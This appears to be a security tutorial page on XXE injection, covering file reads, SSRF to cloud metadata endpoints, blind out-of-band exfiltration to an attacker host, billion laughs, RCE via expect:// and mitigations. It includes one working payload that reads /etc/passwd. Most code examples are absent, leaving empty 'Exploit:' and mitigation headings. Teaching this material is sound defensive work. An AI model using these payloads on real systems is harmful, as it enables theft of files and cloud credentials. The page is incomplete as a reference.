XML External Entity
XML External Entity (XXE) injection is a vulnerability that occurs when an application accepts untrusted XML input and its XML parser is configured to process external entities without validation. This allows attackers to reference external files, URLs, and resources to steal data, perform server-side request forgery (SSRF), execute code, or cause denial of service.
The vulnerability exploits a legitimate XML feature (external entities) that's meant to include external content. When misconfigured, it becomes a weapon for accessing sensitive data and system resources.
Real-World Attack Scenarios
Scenario 1: Reading Local Files via In-Band XXE
An application allows users to upload XML documents for processing:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>How it works:
The attacker crafts an XML document with a DOCTYPE declaration
Inside the DOCTYPE, they define an ENTITY that references a local file using
file://The entity
&xxe;is referenced in the XML contentThe XML parser resolves the entity and includes the file's contents
The application returns the file contents in its response
The response reveals:
The attacker now has user information and can attempt privilege escalation.
Finding it: Test XML endpoints with XXE payloads. Check if external entities are processed. Look for file paths in responses. Try accessing sensitive files like /etc/passwd, /etc/shadow, config files.
Exploit:
Scenario 2: SSRF Attack via XXE
An application processes XML documents and accesses URLs specified in external entities:
The attack:
The attacker references an internal API endpoint that's only accessible from the server. The XML parser makes the request from the server's perspective, bypassing firewall restrictions.
What the attacker can access:
Internal APIs on localhost:8080, localhost:5432, etc.
AWS metadata service: http://169.254.169.254/latest/meta-data/
Docker metadata: http://localhost:2375/
Kubernetes API: http://localhost:10250/
Internal databases
Admin panels on internal networks
AWS Metadata Example:
This returns AWS credentials:
The attacker now has AWS credentials and can access the entire cloud infrastructure.
Finding it: Test XXE with internal IP addresses (localhost, 127.0.0.1, 192.168.*). Try accessing metadata services. Check for cloud credentials in responses. Test common internal ports (5432 for PostgreSQL, 3306 for MySQL, 6379 for Redis).
Exploit:
Scenario 3: Blind XXE with Out-of-Band Data Exfiltration
The application processes XML but doesn't return the content directly. Attacker uses DNS or HTTP callbacks to exfiltrate data:
The attacker hosts an evil DTD file on their server (evil.dtd):
What happens:
The application processes the XML with the external DTD reference
The DTD reads the local file (/etc/passwd)
The DTD encodes the file contents into a URL
The DTD makes a request to attacker.com with the file contents as a parameter
The attacker receives the data in their web server logs
Attacker's web server logs show:
Why it's effective:
Works even if the application doesn't return XML responses
Works behind WAF/IDS that blocks direct file access
Exfiltrates data over DNS (harder to detect)
Combines XXE with external DTD processing
Finding it: Test with out-of-band callbacks. Set up Burp Collaborator or similar. Send XXE payloads with external DTD references. Monitor for DNS/HTTP callbacks. Check if blind XXE is possible even without direct responses.
Exploit:
Scenario 4: Denial of Service — Billion Laughs Attack
An attacker crafts an XML document with exponentially expanding entities:
What happens:
lol= 3 byteslol2= 3 × 10 = 30 byteslol3= 30 × 10 = 300 byteslol4= 300 × 10 = 3,000 byteslol5= 3,000 × 10 = 30,000 bytes
Each expansion multiplies by 10. In reality, with deeper nesting, this reaches gigabytes or terabytes of data, consuming all server memory and CPU.
Result:
Server runs out of memory
CPU usage spikes to 100%
Application becomes unresponsive
Server crashes
Legitimate users can't access the application
Finding it: Test with exponentially expanding entity payloads. Monitor CPU and memory usage when sending XXE payloads. Try to crash the application with billion laughs attack.
Exploit:
Scenario 5: Remote Code Execution via XXE
If the server has PHP with the expect module enabled, XXE can execute commands:
Result:
The attacker can now execute arbitrary commands on the server.
Other RCE vectors:
Java JNDI injection via XXE
Python pickle deserialization
Ruby object injection
Custom deserialization handlers
Realistic scenario:
Downloads and executes malware from attacker's server.
Finding it: Test for RCE with XXE. Use expect:// protocol in payloads. Try common command execution protocols. Check application behavior and error messages.
Scenario 6: XXE in SOAP/Web Services
Web services often accept XML SOAP requests:
SOAP services are common targets because:
XML processing is mandatory
External entity processing often enabled by default
SOAP parsers less frequently patched
Legacy systems often use SOAP
Finding it: Test SOAP endpoints with XXE. Inject payloads in SOAP request bodies. Check WSDL files for hints about XML processing.
Scenario 7: XXE via File Upload (SVG, PDF, Word)
Applications accepting rich document uploads often process XML:
SVG File Example:
Office Document (.docx/.xlsx): These are ZIP files containing XML. Extract and modify internal XML:
PDF with embedded XML: PDFs can contain embedded XML streams vulnerable to XXE.
Finding it: Upload XML-based file formats (SVG, DOCX, XLSX, PDF). Test if XXE is processed. Check for blind XXE if no direct output.
Mitigation Strategies
Disable external entity processing (recommended)
PHP:
Java:
Python:
C#/.NET:
Node.js:
Use whitelisting for DTD If DTD is required, whitelist allowed DOCTYPE declarations:
Validate and sanitize input
Check file size before processing
Validate XML schema before parsing
Reject unexpected DOCTYPE declarations
Use XML schema validation
Use safer alternatives
Use JSON instead of XML when possible
If XML required, use JSON with embedded XML
Use fixed, well-defined schemas
WAF and IDS rules
Block DOCTYPE declarations
Block ENTITY declarations
Block SYSTEM keywords in XML
Monitor for XXE patterns
Regular security testing
Include XXE tests in pentesting
Scan for vulnerable XML parsers
Test third-party libraries
Monitor for new XXE variants
Last updated
